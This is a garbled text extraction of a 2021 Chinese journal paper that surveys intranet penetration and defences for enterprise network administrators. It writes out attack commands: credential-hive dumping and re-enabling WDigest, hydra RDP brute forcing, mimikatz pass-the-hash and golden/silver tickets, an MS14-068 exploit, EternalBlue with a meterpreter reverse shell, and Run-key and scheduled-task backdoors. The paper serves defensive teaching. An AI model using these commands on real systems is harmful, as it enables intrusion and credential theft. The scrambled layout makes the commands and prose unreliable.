2023年12月1日发(作者:)
第卷第
38
3
期
吉化工学院学报
林
Vol.38
No.3
Mar.
20212021
3
年
月
JOURNALCHEMICAL
OFINSTITUTEOF
JILIN
TECHNOLOGY
文章编号
:
1007-2853
()
2021
03-0070-08
简析内网渗透过程及防御措施
徐
过
I
,
2
,
李双远
1
*
*
(,;,
1.
吉林化工学院信息中心
吉林吉林吉林吉林
132022
2•
吉林化工学院信息与控制工程学院
132022
)
摘要,
:
随着信息化建设的发展与局域网的普及
企业局域网的各种核心数据及客户信息都存放在企业
的数据库中其中包括企业的核心生产技术
,
、
生产数据和企业内部信息等
,
由此可以看岀企业的网络安
全相当重要.主要论述内网渗透过程及相关的防御措施,以此给企业网络管理人员提岀相关建议.
关键词
:
内网渗透
;;
信息收集横向渗透跨域攻击暴力破解
;
;
中图分类号
:
TP文献标志码
393.1A10.16039/22-1249.2021.03.015
:
DOI
:
随着局域网
()
Local
Area
Network
丄的应
AN
用与普及
,
越来越多的企业都已建设自己的内部
础上
,
攻击者通过控制该内部主机在企业内网中
进行渗透的过程及相关防御措施
.
网络
(
局域网
)
,
内部网络是企业内部设备之间数
据传输的重要通道
•
企业局域网的建设
,
不仅提高
了员工的工作效率
,
还在一定程度上提高了企业
1
内网信息收集
在内网渗透过程中
,
信息收集尤为重要
•
攻击
数据的安全性
•
但是
,
大多数企业只注重对企业外
部网络威胁的防御
,
忽略了来自企业内部的入侵
防御
•
攻击者就会利用企业内网环境的这一弱点
,
者可以通过信息收集获取内部网络的更多信息
,
比如系统的防火墙防护情况或主机端口开放情况
先通过一些方法取得企业内部某台设备的控制
权
,
再控制内部设备对公司内部网络进行全面渗
等等
•
掌握系统的信息后
,
可以对系统服务进行针
对式入侵
•
信息收集的工作量非常大
,
整个渗透过
程中
,
信息收集所花费的时间和精力是最多的
•
信
息收集这一过程
,
其实就是为接下来的渗透工作
透
•
影响企业网络安全的因素有很多
,
就员工层面
来讲
,
员工浏览不良网站或点击钓鱼链接等行为
造成电脑感染病毒
,
都将会使企业内网中的主机
成为攻击者攻击企业内部网络的工具
•
而就企业
做准备
,
收集到的信息越多
,
渗透就会越容易
,
越
轻松
•
网络管理者来讲
,
如果管理者的安全防范意识不
1.1
本机信息收集
本机信息收集的内容主要包括查询本机所在
内网中的位置和角色内网中存活主机发现
、
、
主机
够强
,
泄露了企业服务器或企业内部主机的登录
密码等私密信息
,
这些都将给企业网络安全带来
很大的安全隐患
•,
企业内部的一台设备沦陷
就可
能会造成企业的整个系统崩溃
,
最后给企业带来
系统识别
、
开放端口探测以及防火墙配置情况
等等.
1.1.1
查询本机系统信息
无以估量的损失
•
由此可见
,
企业内网的安全管理
是多么的重要
•
企业不仅需要重视外部网络的防
御
,
也更应注重企业内部网络的安全防御
•
本文主
了解本机系统信息和补丁安装情况极其重
要
,
通过了解一台主机系统的基本信息
,
可以大概
猜测出内网中其他主机的系统信息和补丁情况
,
要论述在攻击者获取内网中某台主机控制权的基
收稿日期
:
2020-11-17
基金项目
:
吉林省职业技术教育学会科研课题2020XHY195
第
3
期
徐过
,
等
:
简析内网渗透过程及防御措施
71
如果主机系统存在漏洞
,
而他刚好又没及时安装
相应补丁
,
那么就可以利用该漏洞进行渗透
•
如果
查看共享资料
:
Net
view
主机是
Windows
系统
,
那么在命令窗口输入
“
systeminfo
”
命令就可以查询系统的配置信息
,
包
查看
arp
表
:
Arp-a
括系统型号
、
系统版本以及补丁情况等.
1.1.2
查询当前用户角色
查看
hosts:
文件
Type
Cwindows
:
etc
system32
drivers
hosts
系统对用户的权限进行了严格的划分
,
权限
查看
dns
缓存
:
ipconfig
/
displaydns
越高
,
能进行的操作就越多
.Windows
系统中
,
权
限最高的是
TrustedInstallerGuest
,
权限最低的是
用户
,
Administrator
是系统管理员
,
User
为普通用
户
•(
而
Linux
系统中权限最高的是
Root
超级管理
员用户
)
.
在命令窗口输入
“
whoami
”
就可以查询当前
用户所拥有的权限
.
1.1.3
查询本机信息
查询本机服务信息
:
wmic
servicebrief
list
查看防火墙配置
:
Netsh
firewall
show
config
查询当前登录域
:
networkstation
config
快速定位域控
ip
:
net
time
/
domain
查看域控制器
:
netgroup
“domain
domaincontrollers
”
/
1.2存活主机探测及端口扫描
内网存活主机探测的目的是找到内网中其他
存活主机的地址
,
一般一个
IP
对应一台主机
•
端
口扫描是渗透前的基本准备工作攻击者的攻击
,
利用对象基本都是目标主机开放的服务
.
1.2.1
存活主机探测
探测内网存活主机的方法很多
,
可以使用脚
本来实现存活主机的探测
,
还可以通过一些工具
来探测内网存活主机
,Nmap
常用的工具有
、
Nbtscan
、
SuperscanArp-scan
、
等
.
比如执行下列命
令
,
就可使用
nmap
工具探测
192.168.0
网段中的
主机
:
Nmap-sN
192.168.0.0/24
除了用工具发现存活主机以外
,
还可以通过
查看
DNS
、
ARP
表
、
hosts
文件等方式发现内网中
存活的一些主机
.
1.2.2
网络端口扫描
端口是主机各服务运行的主要依赖对象
,
攻
击者可以通过扫描目标主机开放的端口获取目标
主机开放的网络服务程序情况
[
1
]
,
因为一个网络
服务程序对应一个端口
.
TCP
和
UDP
协议的端口
号在
0
—
65535
之间
•
一般情况下
,
1024
以内的端
口号对应常用的网络服务
•:
例如
21
号端口对应
FTP
服务
,22
号端口对应
SSH
服务
,
3389
号端口
对应远程桌面连接服务等
•
可以使用
nmap
工具进
行端口扫描
[
2
]
:
Nmap-A
192.168.1.101/24
2
权限提升
72
吉
林化
工学学报
院
2021
年
(1)
域用户登录时
,
向
KDC
进行预认证
;
(2)
AS
验证密码是否正确
,
如果验证通过
,
制
,
程序在操作启动前会对用户身份进行验证
.
程
序需要
UAC
的授权才能进行某些操作
,
比如访问
则返回给用户一张
TGT
票据
;
(3)
用户拿着服务申请
TGT
向
KDC
的
TGS
系统根目录
,
对重要配置文件进行读取等利用
.
UAC
提权的原理是发现高权限运行但是没有
UAC
提示的应用
,
再找到其启动调用时所缺失的
访问
Application
Server
的票据
;
(4)
,
域控的
TGS
服务验证
TGT
通过后
返回
值
,
然后添加对应的值完成提权
.
2.2.1
给域用户能够访问
Application
Server
的票据
,
Bypassuac
模块提权
即
ST
;
(5)
域用户拿着
ST
访问对应的
Application
假设已经获得目标机器的
meterpreter
shell
,
且当前用户在管理员组中
,
那接下来使用
Server;
(
Server
6)
Application
验证
ST.
客户机
图
1
Kerberos
协议认证过程图
下面简述
ms14-068
的问题为
:
TGT
作为用户凭证
,
包含了用户名
、
用户
id
、
所属组等信息
,
即
PAC.,PAC
简单点讲
就是验证
用户所拥有权限的特权属性证书
.
默认
PAC
是包含在
TGT
中
,
而出现
ms14-
068
这个问题的原因在于用户在申请
TGT
时可以
要求
KDC
返回的
TGT
不包含
PAC
(
include-PAC
为
false)
,TGS_
然后用户自己构造
PAC
并放入
.
REQ
数据包中的
REQ
_
BODY
中
.KDC
会解密
PAC
并加密到一个新的
TGT
中
(
正常应该返回一
个此时这个
ST)
并返回给用户
,
TGT
已经带入了
构造的恶意的
PAC.
利用方法
:
python
ms14-068.
py-u@
<
userName
><
domainName<
>-s
userSid>-d<
domainControlerAddr
〉
":
kerberos
:
ptc
TGT_user@
”
exit
2.2
绕过
UAC
提权
UAC
(
User
Control
Account
)
指用户
账户控
Bypassuac
模块将用户权限提升为
System
权限
.
在
meterpreter
命令窗口执行以下命令
:
Exploit/windows/local/bypassuac
(
将返回一一
个新的
shell)
,
接着执行
"getsystem
”
命令将用户
权限提升为
system
权限
.
2.2.2
RunAs
模块提权
利用
RunAs
模块提权的过程和利用
Bypassuac
模块提权过程相似
.
运行会生
exploit/windows/local/ask
模块时
,
成一个可执行文件
,
如果目标运行程序
,
程序会请
求提升权限
,
如果用户选择继续运行
,
那么就会成
功获得一个更高的权限
.
2.3
Token
窃取
Token
即令牌
,
是描述进程或者线程安全上
下文的对象
,
类似于账号和密码
.
但是
Token
第
3
期
徐过
,
等
:
简析内网渗透过程及防御措施
73
者通过分析密码组成特征
,
利用密码组成特征分
议的登录验证
•
例如执行以下命令使用工具
hydra
暴力破解
ip
为
192.168.1.101
的机器的远程桌面
析出其他主机的密码
•
通过此方法获取其他主机
控制权相比其他方法要容易很多
.
3.1.1
抓取本地用户凭据
协议
,
:
其中的
rdp
是远程桌面协议
Hydra
192.
168.
1.txt-P
101
rdp-L
user.
password[5-7]
.txt-V
Windows
系统中
的密码由
LM
hash
和
NTLM
hash
两部分组成
•
用户名和密码等信息都保存在
3.2
远程连接
SAMC
文件中
.SAM
文件的目录为
:
windows
当拿到目标主机用户密码或
NTLM
Hash
后
.
可以通过凭据传递的方法
,
将散列值或密码传送
到目标机器中进行验证
,
与目标主机建立连接
.
system32config,
该目录存放着用户的密码
,
攻击
者使用以下
REG
命令就可以抓取其中的密码
hash
值
:
reg
save
hklm
sam
reg
save
hklm
system
reg
save
hklm
security
微软公司发布补丁
KB2871997,
关闭了
Wdigest
功能
,
从而防止用户密码以明文形式泄
露
•
但用户可以将注册表下处值改为
0
来禁用
.
HKEY
_
_
LOCAL
MACHINE
SYSTEM
CurrentControlSet
Control
SecurityProviders
WDigest
UseLogonCredential
3.1.2
域
hash
当拿到域控权限后
,
就可以利用工具拷贝出
C
:
中的用户然后
hash
,
再使用如
NTDSDumpEx
等工具解析
hash.
3.1.3
弱口令暴破
弱口令是最容易被利用的漏洞
,
攻击者通常
会使用弱口令爆破常用的默认端口
,
比如
ssh
连
接
223389
端口
,,
远程桌面
端口
Mysql
还有数据
库
3306
端口等
•
如果管理者设置了弱口令或者密
码强度不够
,
那么攻击者通过密码暴力破解就可
以轻轻松松获取主机控制权限
•
当攻击者不知道用户名和密码的时候
,
攻击
者就会尝试对主机的账号和密码进行暴力破解
,
其原理就是利用字典文件中的账号和密码去尝试
连接
,
当字典里的账号和密码和正确的账号和密
码匹配上时
,
就会返回正确结果
•
暴力破解主要分为以下
3
种情况主机上进行身份验证
:
(1)
知道登录用户名但不知道登录密码
;
(2)
知道登录密码但不知道登录用户名
;
(3)
不知道用户名和密码
•
暴力破解的工具有很多
,
常用的有
hydra
、
lasercrack
、
medusa
等
,
爆破工具可以爆破多种协
3.2.1
IPC
IPC(Inter
ProcessConnection
)
是为了
实现进
程间通信而开放的命名管道
.IPC
—
般通过验证
用户名和密码获取相应的权限
•
通过
ipc$,
可以访
问目标主机上的文件
•,
不仅如此
还可以利用他在
目标机器上运行命令
.
执行以下命令
,
与
ip
为
192.168.1.101
的目标
主机建立
ipc$
连接
74
吉林化工学院学报
2021
年
运行
mimikatz,
执行以下命令
,
将实现对目标
Exploit
(
开始执行
)
主机的哈希传递攻击
:
Mimikatz
u
privilege
::
debug
”
“
sekurlsa
::
执行上述命令主要用于检测存在永恒之蓝漏
洞的目标主机
,
接下来执行以下命令对存在该漏
洞的目标主机进行攻击
:
Use
pthtest.
///
user
:
usernamedomain
:ntlm
com
:
d93a5def7511da3d0f2d171d9c344e91
”
exploit/windows/smb/msl7
_
010
3.4
票据传递攻击
_eternalblue
票据传递
(
Pass
The
Ticket
,PTT
)
攻击不同于
哈希传递攻击
,
哈希传递攻击需要管理员权限
,
而
之后可以输入命令
show
options
查看设置参
数
,
使用命令对
ip
为
193.168.1.101
的主机进行
攻击
:
票据传递攻击传递不需要
.
如果没获得管理员权
限
,•
票据传递攻击要比哈希传递攻击容易
可以同样使用
mimikatz
工具进行票据传递
攻击
:
第
1
步
,
导出内存中的票据
:
Mimikatz
“
privilege“
::
:
debug
”
sekurlsa
:
tickets
/
export
”
第
1
步完成后
,
目录中会新增几个票据文件
;
第
2
步
,
清除内存中的票据
:
Mimikatz
#
kerberos
::
purge
第
3
步
,
注入票据文件
:
Mimikatz"“
kerberos
::
:
ptt
C[
ticket
0;
4f7cf
]
-2-0-60a00000-username
@
krbtgt-TEST.
”
3.5
永恒之蓝漏洞攻击
2017
年
5
月
,
名为
“
WannaCry
”
的勒索软件轰
动了整个网络安全界
,
影响了全球近百个国家上
千企业及公共组织
•4
而与之有关的便是同年
月
份被曝出来的
“
永恒之蓝
”
(
MS17-010
)
漏洞
•
永恒
之蓝漏洞被曝出来时
,
威胁着全球
70%
的
windows
服务器的安全
,
该漏洞在互联网中引起
轩然大波
.
永恒之蓝漏洞利用的是在
Windows
系统中默
认开启的
SMB
服务
,
对应的端口号默认为
445
端
口
•
该漏洞的原理是通过向
Windows
服务器中的
SMBv1
服务发送构造的指令造成溢出
,
最终导致
任意命令的执行
.
现在新版的
Metasploit
都包含了
永恒之蓝漏
洞的利用模块
•
执行以下命令可以利用
metasploit
中的模块检测该漏洞
:
Auxiliary/
scanner/
smb/
smb_ms17_010
Set
rhosts
ip
地址段
(
设置扫描
ip
地址范围
)
Set
threads
401
(
设置线程数
,)
默认为
Set
rhost
192.168.1.101
接下来设置攻击
payload,
目标主机的操作系
统不一样
,
设置的
payload,
也不一样
这里需要选
择对应的
playload
:
Set
payload
windows/x64/meterprete"reverse
_tcp
Exploit
(
执行攻击指令
)
攻击成功后就会返回
一个
meterpreter
shell,
通过该
shell
就可以控制目标主机了
.
4
跨域攻击
一般大型企业都有自己的内网
,
为了方便管
理
,
根据职责的不同或功能不同
,
将域划分为主域
和子域
•
如果攻击者得到某个子域的控制权
,
那么
就会通过子域想方设法取得主域的控制权
•
第
3
期
徐
过等
,
:
简析内网渗透过程及防御措施
75
再输入
"powerview
”
命令获取父域
sid
Get-DomainComputer-Domain
断编写更高级的后门
•
为了逃过杀毒软件的
”
追
杀
”
,
后门程序的种类变得多种多样
,
本文只介绍
最后添加一个企业管理员
,
获取父域管理
常见的几种
.
(1)
注册表注入后门
权限
.
执行以下命令有引号的位置表示是需要根
,
据实际信息输入的参数
:
kerberos
:
:
golden
/
user
:'
指定的用户
'
/
攻击者可以通过修改注册表
,
将后门程序路
径添加到注册表中启动并运行后门程序
•
修改的
注册表路径为
:
HKCUMicrosoft
:
Software
Windows
CurrentVRun
ersion
krbtgtkrbtgt
:'
'
hash
/
domainsid
:
'
当前用户名
'
/
:'/sids
当前域的
SID
''
:'
目标域的
SID
/ptt
4.2
攻击Kerberos
Kerberos
是域中的核心协议
,
上文介绍过
Kerberos
的工作流程
,
这里不做累述
•
当获取到
krbtgt
hash
时
,
可以通过伪造票据进行验证
.
4.2.1
金票据
金票据是伪造
Kerberos
协议中的
TGT,
Kerberos
协议验证过程中的是由
TGT
krbtgt
加密
而成
•
所以如果获取到
krbtgt
hash
,
就可以构造任
意的
TGT
了
.
攻击方法
:
Mimikatz :
kerberoskerberos
::
purge
:
goldendomain
sid
//
admin
::
administrator
:域
/
SID
/krbtgt
:hash:kiribi
krbtgt
值
/ticket
administrator.
kerberosadministrator.
:
:
ptt
kiribi
kerberos
:
:
tgt
dir
$
4.2.2
银票据
金票据是伪造
TGT
,
而银票据伪造的是
TGS,
原理和金票据相似
.
攻击方法
:
mimikatz.
domain
exe
":::
kerberos
golden
/
域
/sid
:
SID
/
target
:
域控全
称/
service
:要访问的
服务
,:
如
cifs
/
rc4
NTLMhash
,
计算机账号
/
user
:
userdir
/ptt"
serverc
$
5
权限维持
当攻击者获取目标主机控制权后
,
为了不会
因为入侵时与目标主机建立的连接通道被管理人
员或杀毒软件关闭而失去控制权限
,
攻击者就会
在目标主机上留下其他更隐蔽的后门
[10]
.
随着防御软件功能的升级
,
操作系统后门也
一直不断升级
•,
为了让控制权限更持久
攻击者不
当管理员登录系统时
,
后门程序会自动运行
.
(2)
计划任务后门
计划任务是指系统按照预设的任务指令执行
任务
,
而计划任务后门
,
也是如此
,
可以设置后门
程序的运行时间
•
计划任务的任务类别会因用户
权限的不同而不同
,
管理员权限下的用户可以设
置更多的计划任务
•
将后门程序的运行时间进行
修改
,
可以降低被目标主机发现的风险
•
计划运行后门的命令如下
,
假如将后门程序
每
1
h
运行
1
次
.
Schtasks
///
Create
/
tn
Updater
tr
sc
hourly
/
mo
1
(3)
76
吉工报
林化学学
院
2021
年
端口
,
所以针对内网信息收集的防范措施主要为
以下
3
点
:
(1)
关闭不用的端口
,
尽量减少不必要端口
任关系;
(2)
域之间建立连接时应进行多重身份
验证
;
(3)
不同域之间使用不同密码
.
的开启
;
(2)
增强防火墙的管理策略
,
拦截异常的
6.5
后门种植防范措施
流量
;
(3)
建立安全防护系统
,
对有异常行为的主
攻击者通过种植新的后门来达到持久性控制
目标主机
,
所以只要发现并清理攻击者留下的后
门
,
就可以使攻击者失去控制权•当发现未知的软
机进行通信阻断
.
6.2
权限提升防范措施
件或文件时要及时清除
,,
并且切记将残留文件清
攻击者进行提权方法一般是通过利用系统修
补的漏洞提权
,
系统不安全的权限分配提权和利
用
Token
提权
•
相应的防范措施有以下
6
点
:
(1)
及时给服务器打补丁
,
做好备份
,
才能有
效保障网站安全
,
避免黑客攻击
[
11
]
;
(2)
普通用户或程序给予普通权限
,
不要轻
易将管理员权限分配给用户
;
(3)
不要运行未知安全的软件
,
也不要下载
或传播来路不明的文件
;
(4)
;
缩短
Token
的有效时长
(5)
增强
Token
的验证方法以及安全管理
;
(6)
将密码放在只有管理员权限才能访问的
文件中
.
6.3
针对横向渗透的防范措施
攻击者进行横向渗透的核心是密码
,
所以主
要的防范策略也是以密码安全管理为中心
•
而攻
击者进行横向渗透使用最多的方法是密码暴力破
解和密码碰撞
,
所以
,
企业网络运维人员可以通过
以下
5
个方法进行防范
:
(1)
不选择常用的邮箱以及手机号作为密
码
,
密码最好不要进行反复的使用
,
通常情况多使
用不固定的邮箱进行手机业务的交互
[
12
]
;
(
2)
针对
Kerberoast
攻击
,
确保密码长度超过
25
位
;
(3)
对
Kerberos
票据使用
AES256_HMAC
加密
;
第
3
期
徐过
,
等
:
简析内网渗透过程及防御措施
77
[2]王小妹陈红松陈学平
,
.[
网络安全与管理实验教程
[M].
北
[8]
,
李明
.计算机网络安全与应用M].
北京化
:
京
:
清华大学岀版社
,2015.学工业岀版社,2012.
[3]徐扬,王江涛陈志刚邓晓衡
,
[9]基于伪
,
苑津莎高会生.
等ID
.
的认证普适计算中一种上下文感
RFID
,
,
协议及串空间证明[J].通信学报
计算机科学2012(11)
,,
2017
(10)
::
142-146,176.
[4]
网络攻防技术与实战深入理解信息安全防护
知的自适应可信模型
[J].
41-48,56.
郭帆
.
[10],
武新华
,
王英英李伟
.[M].
网络渗透技术攻防高手修炼
体系
[M].
北京清华大学岀版社
:
,2018,9.
[5]注入到服务器,网络空间安全技术实
, ,
北京:
电子工业岀版社
,2011.
[11]才海龙SQL王小军胡耿然
李双远等
,
王偶师
,
.
从
吕秋云
,
等
.
践教程
[M].
西安:
西安电子科技大学岀版社
,2017.
沦陷全过程剖析
[J].,2010,27
吉林化工学院学报
(4)
:
48-51.
[
12谈国胜[J].
]
李双远
,
.
面向
Web
的攻击方式及防御对策
[6]
陈小兵
.
完全之路渗透技术及实战案例解析
WEB
[M].
2
版,2015.
,
北京
:
电子工业岀版社
[7]刘晨
陈小兵
,
,
黄小波
.
黑客攻防实战加密与解密
[
M].
北京
:
电子工业岀版社
,2016.
吉林化工学院学报
,2019,36(3)
:
47-53.
Brief
Internal
Analysis
of
Network
Penetration
Process
and
Defense
Measures
XU
Guo
1,2
,LI
Shuangyuan
1
*
( JilinControl
1
Information
.
of
Serviceof China;
Center,
Jilin
InstituteTechnology,
Chemical 2.Information
132022,School
and
Engineering,Jilin
Institute
of132022,China)
Chemical
Technology,Jilin
Abstract
:ofofof
With
theinformationthethe
development,
constructionpopularization
and
LAN
most
core
dataenterprisesstored
andincluding
customerareinthethe
information
ofof
database
enterprises,
core
production
technology,production
datait
andinternalbe
enterprise
information,etc.,from
which
canseen
that
thethe
network
securityimportant.
ofinternal
enterprisesof
is
how Thispapermainlynetwork
discusses
process
penetration
and
relevantasgiverelevant
defense
measures,so
toto
Suggestionsmanagers.
enterprise
network
Keywords
:
Network
infiltration;informationpenetration;cross-domain-attack;brute
collection;transverseforce
发布评论